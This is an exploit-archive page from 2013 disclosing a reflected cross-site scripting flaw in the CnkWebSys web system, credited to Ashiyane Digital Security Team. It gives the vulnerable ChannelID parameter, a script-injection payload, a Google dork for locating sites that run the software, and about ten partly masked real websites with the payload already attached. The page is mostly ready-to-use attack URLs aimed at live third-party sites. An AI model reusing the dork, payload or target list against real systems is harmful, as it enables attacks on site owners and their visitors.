Home / exploitsPDF  

CnkWebSys Cross site scripting vulnerability

Posted on 03 September 2013

<pre>#******************************************************************************** # [+] Exploit Title : CnkWebSys Cross site scripting vulnerability #********************************************************************* # [+] Software link : http://www.webchina.com.cn #***************************************************************** # [+] Exploit Author : Ashiyane Digital Security Team #**************************************************** # [+] Tested on: Windows 7 , Linux #********************************* # [+] Google Dork : intext:&quot;Powered by CnkWebSys © CNK Inc.&quot; #*********************************************************** # [+] Date: 2013/09/01 #********************* -------------------------------------------------------------------- # [+] Exploit : # # [+] Location : [Target]/english/about.asp?ChannelID=[xss] # #------- # Proof: #------- # # http://www.aaXde.com/english/about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.hypeXwer.com/english//about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.szXes.com/english/about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.saX.cn/english/about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.suX.com/english//about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.gzXargo.com/english//about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.ruitrXup.com/english//about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://xyhXXXw.cn/english//about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://wwXXom/english//about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://wwXXly.com/english/about.asp?ChannelID=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # ###################### discovered by : ACC3SS ###################### </pre>

 

TOP

Malware :